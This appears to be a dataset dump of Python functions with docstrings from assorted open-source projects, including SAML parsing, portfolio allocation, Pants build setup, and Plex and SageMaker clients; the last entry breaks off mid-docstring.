signature
stringlengths 29
44.1k
| implementation
stringlengths 0
85.2k
|
|---|---|
def get_type_name(t):
    """Get a human-friendly name for the given type.

    :type t: type | None
    :rtype: unicode
    """
    # Known types are resolved through the module-level mapping first.
    if t in __type_names:
        return __type_names[t]
    # Specific types: any integer flavour gets a common translated label.
    if issubclass(t, six.integer_types):
        return _(u'Integer number')
    # Fall back to the capitalized name of the type itself.
    return six.text_type(t.__name__).capitalize()
|
def admin_tools_render_menu_css(context, menu=None):
    """Template tag that renders the menu css files.

    It takes an optional ``Menu`` instance as unique argument; if not
    given, the menu will be retrieved with the ``get_admin_menu`` function.
    """
    active_menu = menu if menu is not None else get_admin_menu(context)
    context.update({
        'template': 'admin_tools/menu/css.html',
        'css_files': active_menu.Media.css,
    })
    return context
|
def log_likelihood_of(self, z):
    """Log likelihood of the measurement `z`.

    This should only be called after a call to update(); calling after
    predict() will yield an incorrect result.
    """
    if z is None:
        # Smallest positive float stands in for "no measurement".
        return log(sys.float_info.min)
    predicted_measurement = dot(self.H, self.x)
    return logpdf(z, predicted_measurement, self.S)
|
def _match_serializers_by_query_arg(self, serializers):
    """Match serializer by query arg."""
    # If the format query argument is configured and present, match the
    # serializer; otherwise no match.
    arg_name = current_app.config.get('REST_MIMETYPE_QUERY_ARG_NAME')
    if not arg_name:
        return None
    arg_value = request.args.get(arg_name, None)
    if arg_value is None:
        return None
    try:
        # Resolve the requested format through the alias table.
        alias = self.serializers_query_aliases[arg_value]
        return serializers[alias]
    except KeyError:
        # Either an unknown format or no serializer registered for it.
        return None
|
def strip_command(self, command_string, output):
    """Strip command_string from output string."""
    # Splitting on the command and re-joining with the response
    # terminator removes every echo of the command from the output.
    fragments = output.split(command_string)
    return self.RESPONSE_RETURN.join(fragments)
|
def dropSpans(spans, text):
    """Drop from text the blocks identified in :param spans:, possibly nested."""
    spans.sort()
    kept = []
    offset = 0
    for begin, end in spans:
        # A span starting before `offset` is nested inside an already
        # dropped region and is skipped entirely.
        if offset <= begin:
            if offset < begin:
                kept.append(text[offset:begin])
            offset = end
    kept.append(text[offset:])
    return ''.join(kept)
|
def add(self, name, value):
    """Adds a new entry to the table.

    We reduce the table size if the entry will make the table size
    greater than maxsize.
    """
    entry_size = table_entry_size(name, value)
    if entry_size > self._maxsize:
        # An entry bigger than the whole budget can never fit, so the
        # table is simply cleared.
        self.dynamic_entries.clear()
        self._current_size = 0
        return
    # Add the new entry only if the table actually has a size.
    if self._maxsize > 0:
        self.dynamic_entries.appendleft((name, value))
        self._current_size += entry_size
        self._shrink()
|
def parse_commandline(argv):
    """Returns the arguments parsed from *argv* as a namespace.

    :param argv: command line arguments (excluding the program name).
    :returns: an ``argparse.Namespace`` holding the parsed options.
    :raises SystemExit: through ``ArgumentParser.error`` when context or
        file options are used without ``--wrap-with-html``.
    """
    ap = ArgumentParser(prog='wdiffhtml', description=DESCRIPTION, epilog=EPILOG, )
    ap.add_argument('--version', action='version', version='wdiffhtml v{}'.format(version), help="shows version and exits")
    ap.add_argument('org_file', metavar='FILENAME', help="original file")
    ap.add_argument('new_file', metavar='FILENAME', help="changed file")
    # Options controlling the HTML document wrapped around the raw wdiff output.
    g_html = ap.add_argument_group('Wrapper', "Without these settings, only the `wdiff` output is returned (with INS " "and DEL tags). Here are some options to wrap the output in a HTML " "document.")
    g_html.add_argument('-w', '--wrap-with-html', action='store_true', help="wrap the diff with a HTML document")
    g_html.add_argument('-f', '--fold-tags', action='store_true', help="allow INS and DEL tags to span linebraks")
    g_html.add_argument('-b', '--hard-breaks', action='store_true', help="replace line breaks with BR tags")
    # Extra information shown in the HTML output (needs --wrap-with-html).
    g_context = ap.add_argument_group('Context', "With these options you can add additional information to the HTML " "output (means these only work alongside the `--wrap-with-html` option).")
    g_context.add_argument('-r', '--revision', metavar='STRING', help="add a revision tag or version number to the output")
    # Date stamp and full timestamp are mutually exclusive.
    x_stamp = g_context.add_mutually_exclusive_group()
    x_stamp.add_argument('-d', '--datestamp', action='store_true', help="add a date to the output (UTC now)")
    x_stamp.add_argument('-D', '--timestamp', action='store_true', help="add date and time to the output (UTC now)")
    # User-supplied template / asset files (need --wrap-with-html).
    g_files = ap.add_argument_group('Files', "Instead of using the default templates, you can use your own files. " "These only work alongside the `--wrap-with-html` option")
    g_files.add_argument('-t', '--template', type=FileType('r'), metavar='FILE', help="load the Jinja2 template from this file")
    g_files.add_argument('-c', '--css', type=FileType('r'), metavar='FILE', help="load CSS from this file")
    g_files.add_argument('-j', '--js', type=FileType('r'), metavar='FILE', help="load Javascript from this file")
    g_files.add_argument('-J', '--js2', type=FileType('r'), metavar='FILE', help="load another Javascript from this file (like Zepto)")
    # parse args
    args = ap.parse_args(argv)
    # check for wrapper
    if not args.wrap_with_html:
        # check context arguments and file arguments
        # NOTE(review): this relies on the private argparse attribute
        # `_group_actions` to enumerate each group's options — confirm it
        # matches the argparse version in use.
        for group in (g_context, g_files):
            args_to_check = [opt.dest for opt in group._group_actions]
            if any([getattr(args, attr) for attr in args_to_check]):
                msg = "the options require that `--wrap-with-html` is used"
                ap.error(msg)
    return args
|
def absdeg(deg):
    '''Change from signed degrees to 0-180 or 0-360 ranges.

    deg: ndarray
        Movement data in pitch, roll, yaw (degrees)

    Returns
    -------
    deg_abs: ndarray
        Movement translated from -180:180 / -90:90 degrees to
        0:360 / 0:180 degrees

    Example
    -------
    deg = numpy.array([-170, -120, 0, 90])
    absdeg(deg)  # returns array([190, 240, 0, 90])
    '''
    import numpy

    result = numpy.copy(deg)
    negative = deg < 0
    # Values beyond +/-90 imply a -180:180 input range (wrap into 0:360);
    # otherwise the input is treated as -90:90 (wrap into 0:180).
    wrap = 360 if numpy.max(numpy.abs(deg)) > 90.0 else 180
    result[negative] = wrap + deg[negative]
    return result
|
def getAnalysisKeywords(self):
    """Return the unique analysis service keywords found in the raw results.

    :returns: list of unique keywords (order not guaranteed).
    """
    # Accumulate into a set instead of rebuilding `list(set(old + keys))`
    # for every row: that was quadratic, and `list + dict_keys` raises
    # TypeError on Python 3.
    keywords = set()
    for rows in self.getRawResults().values():
        for row in rows:
            keywords.update(row.keys())
    return list(keywords)
|
def size_on_disk(self, start_pos=0):
    """Returns the size of this instruction and its operands when packed.

    `start_pos` is required for the `tableswitch` and `lookupswitch`
    instructions as the padding depends on alignment.
    """
    # Every instruction occupies at least the opcode byte itself.
    total = 1
    operand_fmts = opcode_table[self.opcode]['operands']
    if self.wide:
        total += 2
        # iinc (0x84) carries a second, extended operand when widened.
        if self.opcode == 0x84:
            total += 2
    elif operand_fmts:
        # A simple opcode with simple operands.
        for fmt, _ in operand_fmts:
            total += fmt.value.size
    elif self.opcode == 0xAB:
        # lookupswitch: pad to the next 4-byte boundary after the opcode.
        total += -(start_pos + 1) % 4
        # default & npairs header ...
        total += 8
        # ... plus one 8-byte (match, offset) pair per entry.
        total += len(self.operands[0]) * 8
    elif self.opcode == 0xAA:
        # tableswitch
        raise NotImplementedError()
    return total
|
def suggest_pairs(top_n=10, per_n=3, ignore_before=300):
    """Find the maximally interesting pairs of players to match up.

    First, sort the ratings by uncertainty.
    Then, take the `top_n` players with the highest uncertainty.
    For each of them, call them `p1`, sort all the models by their distance
    from p1's rating and take the nearest rated models ('candidate_p2s').
    Choose pairings, (p1, p2), randomly from this list.

    `top_n` will pair the top n models by uncertainty.
    `per_n` will give each of the top_n models this many opponents.
    `ignore_before` is the model number to `filter` off, i.e., the early models.

    Returns a list of *model numbers*, not model ids.
    """
    db = sqlite3.connect("ratings.db")
    data = db.execute("select model_winner, model_loser from wins").fetchall()
    # Restrict game records to models belonging to the current bucket.
    bucket_ids = [id[0] for id in db.execute("select id from models where bucket = ?", (fsdb.models_dir(),)).fetchall()]
    bucket_ids.sort()
    data = [d for d in data if d[0] in bucket_ids and d[1] in bucket_ids]
    # (model_number, rating, uncertainty) triples.
    ratings = [(model_num_for(k), v[0], v[1]) for k, v in compute_ratings(data).items()]
    ratings.sort()
    ratings = ratings[ignore_before:]
    # Filter off the first 100 models, which improve too fast.
    ratings.sort(key=lambda r: r[2], reverse=True)
    res = []
    for p1 in ratings[:top_n]:
        # Nearest-rated candidates; index 0 is p1 itself and is skipped.
        candidate_p2s = sorted(ratings, key=lambda p2_tup: abs(p1[1] - p2_tup[1]))[1:20]
        # NOTE(review): random.sample raises ValueError if per_n exceeds the
        # number of candidates — confirm callers guarantee enough models.
        choices = random.sample(candidate_p2s, per_n)
        print("Pairing {}, sigma {:.2f} (Rating {:.2f})".format(p1[0], p1[2], p1[1]))
        for p2 in choices:
            res.append([p1[0], p2[0]])
            print(" {}, ratings delta {:.2f}".format(p2[0], abs(p1[1] - p2[1])))
    return res
|
def _parse_request(self, enc_request, request_cls, service, binding):
    """Parse a Request.

    :param enc_request: The request in its transport format
    :param request_cls: The type of requests I expect
    :param service:
    :param binding: Which binding that was used to transport the message
        to this entity.
    :return: A request instance, or None if verification failed
    """
    _log_info = logger.info
    _log_debug = logger.debug
    # The addresses I should receive messages like this on
    receiver_addresses = self.config.endpoint(service, binding, self.entity_type)
    if not receiver_addresses and self.entity_type == "idp":
        # An IdP may also expose aa/aq/pdp endpoints; fall back to the
        # first of those that is configured.
        for typ in ["aa", "aq", "pdp"]:
            receiver_addresses = self.config.endpoint(service, binding, typ)
            if receiver_addresses:
                break
    _log_debug("receiver addresses: %s", receiver_addresses)
    _log_debug("Binding: %s", binding)
    # Accepted clock skew between the parties; default to 0 when the
    # option is missing or falsy.
    try:
        timeslack = self.config.accepted_time_diff
        if not timeslack:
            timeslack = 0
    except AttributeError:
        timeslack = 0
    _request = request_cls(self.sec, receiver_addresses, self.config.attribute_converters, timeslack=timeslack)
    # Decode the transport encoding into the raw XML message.
    xmlstr = self.unravel(enc_request, binding, request_cls.msgtype)
    must = self.config.getattr("want_authn_requests_signed", "idp")
    only_valid_cert = self.config.getattr("want_authn_requests_only_with_valid_cert", "idp")
    if only_valid_cert is None:
        only_valid_cert = False
    if only_valid_cert:
        # Requiring a valid certificate implies requiring a signature.
        must = True
    _request = _request.loads(xmlstr, binding, origdoc=enc_request, must=must, only_valid_cert=only_valid_cert)
    _log_debug("Loaded request")
    if _request:
        _request = _request.verify()
        _log_debug("Verified request")
    if not _request:
        return None
    else:
        return _request
|
def portfolio(weights, latest_prices, min_allocation=0.01, total_portfolio_value=10000):
    """For a long only portfolio, convert the continuous weights to a discrete
    allocation in a greedy iterative approach. This can be thought of as a
    clever way to round the continuous weights to an integer number of shares.

    :param weights: continuous weights generated from the ``efficient_frontier`` module
    :type weights: dict
    :param latest_prices: the most recent price for each asset
    :type latest_prices: pd.Series or dict
    :param min_allocation: any weights less than this number are considered
        negligible, defaults to 0.01
    :type min_allocation: float, optional
    :param total_portfolio_value: the desired total value of the portfolio,
        defaults to 10000
    :type total_portfolio_value: int/float, optional
    :raises TypeError: if ``weights`` is not a dict
    :raises TypeError: if ``latest_prices`` isn't a series
    :raises ValueError: if not ``0 < min_allocation < 0.3``
    :return: the number of shares of each ticker that should be purchased,
        along with the amount of funds leftover.
    :rtype: (dict, float)
    """
    if not isinstance(weights, dict):
        raise TypeError("weights should be a dictionary of {ticker: weight}")
    if not isinstance(latest_prices, (pd.Series, dict)):
        raise TypeError("latest_prices should be a pd.Series")
    # NOTE(review): only the upper bound is enforced here even though the
    # docstring promises ``0 < min_allocation < 0.3`` — confirm intent.
    if min_allocation > 0.3:
        raise ValueError("min_allocation should be a small float")
    if total_portfolio_value <= 0:
        raise ValueError("total_portfolio_value must be greater than zero")
    # Drop any companies with negligible weights. We use a tuple because order matters.
    nonzero_weights = [(k, v) for k, v in weights.items() if v > min_allocation]
    print("{} out of {} tickers were removed".format(len(weights) - len(nonzero_weights), len(weights)))
    # Sort in descending order of weight
    nonzero_weights.sort(key=lambda x: x[1], reverse=True)
    available_funds = total_portfolio_value
    shares_bought = []
    buy_prices = []
    # First round: buy the floor of the share count implied by each weight.
    for ticker, weight in nonzero_weights:
        price = latest_prices[ticker]
        # Attempt to buy the lower integer number of shares
        n_shares = int(weight * total_portfolio_value / price)
        cost = n_shares * price
        if cost > available_funds:
            # Buy as many as possible
            # NOTE(review): float floor-division yields a float share count,
            # and `cost` is not recomputed after clipping, so funds can go
            # negative here — confirm whether this is the intended behaviour.
            n_shares = available_funds // price
            if n_shares == 0:
                print("Insufficient funds")
        available_funds -= cost
        shares_bought.append(n_shares)
        buy_prices.append(price)
    # Second round
    while available_funds > 0:
        # Calculate the equivalent continuous weights of the shares that
        # have already been bought
        current_weights = np.array(buy_prices) * np.array(shares_bought)
        current_weights /= current_weights.sum()
        ideal_weights = np.array([i[1] for i in nonzero_weights])
        deficit = ideal_weights - current_weights
        # Attempt to buy the asset whose current weights deviate the most
        idx = np.argmax(deficit)
        ticker, weight = nonzero_weights[idx]
        price = latest_prices[ticker]
        # If we can't afford this asset, search for the next highest deficit that we
        # can purchase.
        counter = 0
        while price > available_funds:
            # we can no longer purchase the asset at idx
            deficit[idx] = 0
            # find the next most deviant asset
            idx = np.argmax(deficit)
            # If either of these conditions is met, we break out of both while loops
            # hence the repeated statement below
            if deficit[idx] < 0 or counter == 10:
                break
            ticker, weight = nonzero_weights[idx]
            price = latest_prices[idx == idx and ticker]
            counter += 1
        if deficit[idx] <= 0 or counter == 10:
            # See https://stackoverflow.com/questions/189645/
            break
        # Buy one share at a time
        shares_bought[idx] += 1
        available_funds -= price
    print("Funds remaining: {:.2f}".format(available_funds))
    num_shares = dict(zip([i[0] for i in nonzero_weights], shares_bought))
    return num_shares, available_funds
|
def _extract_zip(archive, dest=None, members=None):
    """Extract the ZipInfo object to a real file on the path targetpath."""
    # Python 2.5 compatibility.
    target_dir = dest or os.getcwd()
    entries = members or archive.infolist()
    for entry in entries:
        # Plain member names are resolved to their ZipInfo records first.
        if isinstance(entry, basestring):
            entry = archive.getinfo(entry)
        _extract_zip_member(archive, entry, target_dir)
|
def get_historical_output(self, assessment, options):
    """To get output of a historical Assessment.

    :param assessment: string
    :param options: dict
    """
    response_format = None
    # Pull the format out of the options (it is sent separately to the
    # downstream call) and blank it in the query parameters.
    if options and options.get('format') is not None:
        response_format = options['format']
        options['format'] = None
    query = urllib.parse.urlencode(options)
    url = '/assessment/' + str(assessment) + '/output?' + query
    return self.http.downstream(url, response_format)
|
def make_posix(path):
    # type: (str) -> str
    """Convert a path with possible windows-style separators to a
    posix-style path (with ``/`` separators instead of ``\\`` separators).

    :param Text path: A path to convert.
    :return: A converted posix-style path
    :rtype: Text
    """
    if not isinstance(path, six.string_types):
        raise TypeError("Expected a string for path, received {0!r}...".format(path))
    # Remember whether the path was absolute before splitting eats the
    # leading separator.
    had_leading_sep = path.startswith(os.path.sep)
    parts = normalize_path(path).split(os.path.sep)
    if isinstance(parts, (list, tuple)):
        path = posixpath.join(*parts)
        if had_leading_sep:
            path = "/{0}".format(path)
    return path
|
def users_create_token(self, user_id=None, username=None, **kwargs):
    """Create a user authentication token."""
    # Exactly one identifier is required; user_id takes precedence.
    if user_id:
        return self.__call_api_post('users.createToken', userId=user_id, kwargs=kwargs)
    if username:
        return self.__call_api_post('users.createToken', username=username, kwargs=kwargs)
    raise RocketMissingParamException('userID or username required')
|
def _get_bin(self, key):
    '''Returns a binned dictionary based on redis zscore.

    @return: The sorted dict
    '''
    # zscan_iter does not yield members in score order, so bin items by
    # score first; callers can then walk the keys in sorted order.
    binned = {}
    for member, score in self.redis_conn.zscan_iter(key):
        item = ujson.loads(member)
        # score is negated in redis
        binned.setdefault(-score, []).append(item)
    return binned
|
def check_input_files_for_variadic_seq(headerDir, sourceDir):
    """Checks if files, used as input when pre-processing MPL-containers in
    their variadic form, need fixing."""
    # Check input files in include/source-directories.
    candidates = glob.glob(os.path.join(headerDir, "*.hpp"))
    candidates += glob.glob(os.path.join(headerDir, "aux_", "*.hpp"))
    candidates += glob.glob(os.path.join(sourceDir, "src", "*"))
    # True as soon as any file's header comment indicates it needs fixing
    # (any() short-circuits exactly like the original early return).
    return any(check_header_comment(f) for f in sorted(candidates))
|
def setup_legacy_graph_extended(pants_ignore_patterns, workdir, local_store_dir, build_file_imports_behavior, options_bootstrapper, build_configuration, build_root=None, native=None, glob_match_error_behavior=None, build_ignore_patterns=None, exclude_target_regexps=None, subproject_roots=None, include_trace_on_error=True, execution_options=None, ):
    """Construct and return the components necessary for LegacyBuildGraph construction.

    :param list pants_ignore_patterns: A list of path ignore patterns for FileSystemProjectTree,
        usually taken from the '--pants-ignore' global option.
    :param str workdir: The pants workdir.
    :param local_store_dir: The directory to use for storing the engine's LMDB store in.
    :param build_file_imports_behavior: How to behave if a BUILD file being parsed tries to use
        import statements. Valid values: "allow", "warn", "error".
    :type build_file_imports_behavior: string
    :param str build_root: A path to be used as the build root. If None, then default is used.
    :param Native native: An instance of the native-engine subsystem.
    :param options_bootstrapper: A `OptionsBootstrapper` object containing bootstrap options.
    :type options_bootstrapper: :class:`pants.options.options_bootstrapper.OptionsBootstrapper`
    :param build_configuration: The `BuildConfiguration` object to get build file aliases from.
    :type build_configuration: :class:`pants.build_graph.build_configuration.BuildConfiguration`
    :param glob_match_error_behavior: How to behave if a glob specified for a target's sources or
        bundles does not expand to anything.
    :type glob_match_error_behavior: :class:`pants.option.global_options.GlobMatchErrorBehavior`
    :param list build_ignore_patterns: A list of paths ignore patterns used when searching for BUILD
        files, usually taken from the '--build-ignore' global option.
    :param list exclude_target_regexps: A list of regular expressions for excluding targets.
    :param list subproject_roots: Paths that correspond with embedded build roots
        under the current build root.
    :param bool include_trace_on_error: If True, when an error occurs, the error message will
        include the graph trace.
    :param execution_options: Option values for (remote) process execution.
    :type execution_options: :class:`pants.option.global_options.ExecutionOptions`
    :returns: A LegacyGraphScheduler.
    """
    # Fill in defaults for everything the caller did not supply.
    build_root = build_root or get_buildroot()
    build_configuration = build_configuration or BuildConfigInitializer.get(options_bootstrapper)
    bootstrap_options = options_bootstrapper.bootstrap_options.for_global_scope()
    build_file_aliases = build_configuration.registered_aliases()
    rules = build_configuration.rules()
    symbol_table = _legacy_symbol_table(build_file_aliases)
    project_tree = FileSystemProjectTree(build_root, pants_ignore_patterns)
    execution_options = execution_options or DEFAULT_EXECUTION_OPTIONS
    # Register "literal" subjects required for these rules.
    parser = LegacyPythonCallbacksParser(symbol_table, build_file_aliases, build_file_imports_behavior)
    address_mapper = AddressMapper(parser=parser, build_ignore_patterns=build_ignore_patterns, exclude_target_regexps=exclude_target_regexps, subproject_roots=subproject_roots)

    # Singleton rules that expose the configured values to the engine by type.
    @rule(GlobMatchErrorBehavior, [])
    def glob_match_error_behavior_singleton():
        return glob_match_error_behavior or GlobMatchErrorBehavior.ignore

    @rule(BuildConfiguration, [])
    def build_configuration_singleton():
        return build_configuration

    @rule(SymbolTable, [])
    def symbol_table_singleton():
        return symbol_table

    # Create a Scheduler containing graph and filesystem rules, with no installed goals. The
    # LegacyBuildGraph will explicitly request the products it needs.
    rules = (
        [RootRule(Console), glob_match_error_behavior_singleton, build_configuration_singleton, symbol_table_singleton, ]
        + create_legacy_graph_tasks()
        + create_fs_rules()
        + create_process_rules()
        + create_graph_rules(address_mapper)
        + create_options_parsing_rules()
        + structs_rules()
        # TODO: This should happen automatically, but most tests (e.g. tests/python/pants_test/auth) fail if it's not here:
        + python_test_runner.rules()
        + rules
    )
    goal_map = EngineInitializer._make_goal_map_from_rules(rules)
    union_rules = build_configuration.union_rules()
    scheduler = Scheduler(native, project_tree, workdir, local_store_dir, rules, union_rules, execution_options, include_trace_on_error=include_trace_on_error, visualize_to_dir=bootstrap_options.native_engine_visualize_to, )
    return LegacyGraphScheduler(scheduler, build_file_aliases, goal_map)
|
def get_top_frame(self, wb_url, wb_prefix, host_prefix, env, frame_mod, replay_mod, coll='', extra_params=None):
    """Render the top-level frame insert for a replayed page.

    :param rewrite.wburl.WbUrl wb_url: The WbUrl for the request this template is being rendered for
    :param str wb_prefix: The URL prefix pywb is serving the content using (e.g. http://localhost:8080/live/)
    :param str host_prefix: The host URL prefix pywb is running on (e.g. http://localhost:8080)
    :param dict env: The WSGI environment dictionary for the request this template is being rendered for
    :param str frame_mod: The modifier to be used for framing (e.g. if_)
    :param str replay_mod: The modifier to be used in the URL of the page being replayed (e.g. mp_)
    :param str coll: The name of the collection this template is being rendered for
    :param dict extra_params: Additional parameters to be supplied to the Jinja template render method
    :return: The frame insert string
    :rtype: str
    """
    embed_url = wb_url.to_str(mod=replay_mod)
    # Use the request's own timestamp when present, otherwise "now".
    timestamp = wb_url.timestamp if wb_url.timestamp else timestamp_now()
    is_proxy = 'wsgiprox.proxy_host' in env
    params = {
        'host_prefix': host_prefix,
        'wb_prefix': wb_prefix,
        'wb_url': wb_url,
        'coll': coll,
        'options': {'frame_mod': frame_mod, 'replay_mod': replay_mod},
        'embed_url': embed_url,
        'is_proxy': is_proxy,
        'timestamp': timestamp,
        'url': wb_url.get_url(),
    }
    if extra_params:
        params.update(extra_params)
    if self.banner_view:
        # The banner is rendered first (without itself in params), then
        # injected for the final template render.
        params['banner_html'] = self.banner_view.render_to_string(env, **params)
    return self.render_to_string(env, **params)
|
def GetCodeObjectAtLine(module, line):
    """Searches for a code object at the specified line in the specified module.

    Args:
        module: module to explore.
        line: 1-based line number of the statement.

    Returns:
        (True, code object) on success or (False, (prev_line, next_line)) on
        failure, where prev_line and next_line are the closest lines with
        code above and below the specified line, or None if they do not exist.
    """
    if not hasattr(module, '__file__'):
        return (False, (None, None))
    best_below = 0
    best_above = six.MAXSIZE
    for code_object in _GetModuleCodeObjects(module):
        for number in _GetLineNumbers(code_object):
            if number == line:
                return (True, code_object)
            if number < line:
                best_below = max(best_below, number)
            else:
                best_above = min(best_above, number)
                # Presumably the line numbers are ascending, so the first
                # one past the target ends the scan of this code object.
                break
    return (False, (None if best_below == 0 else best_below,
                    None if best_above == six.MAXSIZE else best_above))
|
def get_scissors_builder(self):
    """Returns an instance of :class:`ScissorsBuilder` from the SIGRES file.

    Raise:
        `RuntimeError` if SIGRES file is not found.
    """
    from abipy.electrons.scissors import ScissorsBuilder
    # Guard clause: bail out early when no SIGRES file is available.
    if not self.sigres_path:
        raise RuntimeError("Cannot find SIGRES file!")
    return ScissorsBuilder.from_file(self.sigres_path)
|
async def system_bus_async(loop=None, **kwargs):
    "returns a Connection object for the D-Bus system bus."
    raw_bus = await dbus.Connection.bus_get_async(DBUS.BUS_SYSTEM, private=False, loop=loop)
    return Connection(raw_bus).register_additional_standard(**kwargs)
|
def digits(number, base=10):
    """Determine the number of digits of a number in a specific base.

    Args:
        number (int): An integer number represented in base 10.
        base (int): The base to find the number of digits in.

    Returns:
        Number of digits when represented in a particular base (integer).
        Zero and negative numbers are reported as having 0 digits.

    Examples:
        >>> digits(255)
        3
        >>> digits(255, 16)
        2
        >>> digits(256, 16)
        3
        >>> digits(256, 2)
        9
        >>> digits(0, 678363)
        0
        >>> digits(-1, 678363)
        0
        >>> digits(12345, 10)
        5
    """
    if number < 1:
        return 0
    count = 0
    while number >= 1:
        # Each integer division by the base strips one digit.
        number //= base
        count += 1
    return count
|
def sections(self):
    """Returns a list of all media sections in this library. Library sections may be any of
    :class:`~plexapi.library.MovieSection`, :class:`~plexapi.library.ShowSection`,
    :class:`~plexapi.library.MusicSection`, :class:`~plexapi.library.PhotoSection`.
    """
    key = '/library/sections'
    found = []
    section_classes = (MovieSection, ShowSection, MusicSection, PhotoSection)
    for elem in self._server.query(key):
        elem_type = elem.attrib.get('type')
        for cls in section_classes:
            if elem_type == cls.TYPE:
                section = cls(self._server, elem, key)
                # Cache the section by id for later direct lookups.
                self._sectionsByID[section.key] = section
                found.append(section)
    return found
|
def create_training_job(self, TrainingJobName, AlgorithmSpecification, OutputDataConfig, ResourceConfig, InputDataConfig=None, **kwargs):
    """Create a training job in Local Mode.

    Args:
        TrainingJobName (str): local training job name.
        AlgorithmSpecification (dict): Identifies the training algorithm to use.
        InputDataConfig (dict): Describes the training dataset and the location where it is stored.
        OutputDataConfig (dict): Identifies the location where you want to save the results of model training.
        ResourceConfig (dict): Identifies the resources to use for local model training.
        HyperParameters (dict) [optional]: Specifies these algorithm-specific parameters to influence
            the quality of the final model.
    """
    InputDataConfig = InputDataConfig or {}
    container = _SageMakerContainer(
        ResourceConfig['InstanceType'],
        ResourceConfig['InstanceCount'],
        AlgorithmSpecification['TrainingImage'],
        self.sagemaker_session,
    )
    training_job = _LocalTrainingJob(container)
    hyperparameters = kwargs.get('HyperParameters', {})
    training_job.start(InputDataConfig, OutputDataConfig, hyperparameters, TrainingJobName)
    # Remember the job so later describe-style calls can find it.
    LocalSagemakerClient._training_jobs[TrainingJobName] = training_job
|
def authorize(self, scope=None, redirect_uri=None, state=None):
    """Redirect to GitHub and request access to a user's data.

    :param scope: List of `Scopes`_ for which to request access, formatted
        as a string or comma delimited list of scopes as a string. Defaults
        to ``None``, resulting in granting read-only access to public
        information (includes public user profile info, public repository
        info, and gists). For example, to get read/write access to user
        profile information in addition to read-write access to code, commit
        status, etc., use the `Scopes`_ ``user`` and ``repo``::

            github.authorize(scope="user,repo")

    :type scope: str
    :param redirect_uri: `Redirect URL`_ to which to redirect the user after
        authentication. Defaults to ``None``, resulting in using the default
        redirect URL for the OAuth application as defined in GitHub. This
        URL can differ from the callback URL defined in your GitHub
        application, however it must be a subdirectory of the specified
        callback URL, otherwise raises a :class:`GitHubError`::

            # Our application's callback URL is "http://example.com/callback"
            redirect_uri = "http://example.com/callback/my/path"
            github.authorize(scope="user,repo", redirect_uri=redirect_uri)

    :type redirect_uri: str
    :param state: An unguessable random string. It is used to protect
        against cross-site request forgery attacks.
    :type state: str

    .. _Scopes: https://developer.github.com/v3/oauth/#scopes
    .. _Redirect URL: https://developer.github.com/v3/oauth/#redirect-urls
    """
    _logger.debug("Called authorize()")
    params = {'client_id': self.client_id}
    # Only include the optional query parameters the caller supplied.
    for name, value in (('scope', scope), ('redirect_uri', redirect_uri), ('state', state)):
        if value:
            params[name] = value
    url = self.auth_url + 'authorize?' + urlencode(params)
    _logger.debug("Redirecting to %s", url)
    return redirect(url)
|
def _chunk_query(l, n, cn, conn, table, db_type):
    """Insert an SQL query in chunks based on n rows.

    Args:
        l (list): List of tuples (the rows to insert)
        n (int): Number of rows per chunk
        cn (str): Column names
        conn (connection object): Database connection object
        table (str): Table name
        db_type (str): If "sqlite" or "mysql"
    """
    # A plain loop rather than a list comprehension: insert_query_m is
    # called purely for its side effect, so building a throwaway list of
    # None results was wasteful and misleading.
    for i in range(0, len(l), n):
        insert_query_m(l[i:i + n], table, conn, cn, db_type)
|
def generic_add(a, b):
    """Simple function to add two numbers.

    :param a: first addend
    :param b: second addend
    :return: ``a + b``
    """
    # The original had a stray bare `print` statement before the string
    # literal, which prevented it from being the function's docstring.
    logger.info('Called generic_add({}, {})'.format(a, b))
    return a + b
|
def xml_request(check_object=False, check_invalid_data_mover=False):
    """Decorator factory marking a method as building an XML API request.

    The wrapped method constructs and returns a request; the wrapper then
    submits it via ``self.request`` and returns the response.

    :param check_invalid_data_mover: forwarded to ``self.request``
    :param check_object: forwarded to ``self.request``
    :return: the response of this request
    """

    def decorator(f):
        @functools.wraps(f)
        def func_wrapper(self, *argv, **kwargs):
            built_request = f(self, *argv, **kwargs)
            return self.request(
                built_request,
                check_object=check_object,
                check_invalid_data_mover=check_invalid_data_mover,
            )

        return func_wrapper

    return decorator
|
def valid_project(self):
    """Close the active project if it is no longer valid.

    Retrieves the active project path from the Projects plugin; if a path
    is set but no longer points to a valid Spyder project, warn the user
    and close the project automatically.
    """
    try:
        path = self.projects.get_active_project_path()
    except AttributeError:
        # Projects plugin unavailable / not initialized yet.
        return
    # The original had a redundant ``bool(path)`` plus a duplicate nested
    # ``if path:`` guard; a single truthiness check is sufficient.
    if path and not self.projects.is_valid_project(path):
        QMessageBox.critical(
            self, _('Error'),
            _("<b>{}</b> is no longer a valid Spyder project! "
              "Since it is the current active project, it will "
              "be closed automatically.").format(path))
        self.projects.close_project()
|
async def set_default_min_hwe_kernel(cls, version: typing.Optional[str]):
    """See `get_default_min_hwe_kernel`.

    ``None`` is normalized to the empty string before being stored.
    """
    value = version if version is not None else ""
    await cls.set_config("default_min_hwe_kernel", value)
|
def _highlight_lines(self, tokensource):
    """Post-process the token stream coming from `_format_lines`, wrapping
    the lines listed in the `hl_lines` option in highlight markup."""
    wanted = self.hl_lines
    for index, (ttype, text) in enumerate(tokensource):
        if ttype != 1:
            # Pass non-line tokens straight through.
            yield ttype, text
        # Line numbers are 1-based while enumerate() is 0-based.
        if index + 1 not in wanted:
            yield 1, text
        elif self.noclasses:
            attr = ''
            if self.style.highlight_color is not None:
                attr = (' style="background-color: %s"'
                        % (self.style.highlight_color,))
            yield 1, '<span%s>%s</span>' % (attr, text)
        else:
            yield 1, '<span class="hll">%s</span>' % text
|
def matrix(df, filter=None, n=0, p=0, sort=None, figsize=(25, 10), width_ratios=(15, 1),
           color=(0.25, 0.25, 0.25), fontsize=16, labels=None, sparkline=True, inline=False,
           freq=None):
    """A matrix visualization of the nullity of the given DataFrame.

    For optimal performance, please stay within 250 rows and 50 columns.

    :param df: The `DataFrame` being mapped.
    :param filter: The filter to apply to the heatmap. Should be one of "top", "bottom", or None (default).
    :param n: The max number of columns to include in the filtered DataFrame.
    :param p: The max percentage fill of the columns in the filtered DataFrame.
    :param sort: The sort to apply to the heatmap. Should be one of "ascending", "descending", or None (default).
    :param figsize: The size of the figure to display.
    :param fontsize: The figure's font size. Default to 16.
    :param labels: Whether or not to display the column names. Defaults to the underlying data labels when there are
        50 columns or less, and no labels when there are more than 50 columns.
    :param sparkline: Whether or not to display the sparkline. Defaults to True.
    :param width_ratios: The ratio of the width of the matrix to the width of the sparkline. Defaults to `(15, 1)`.
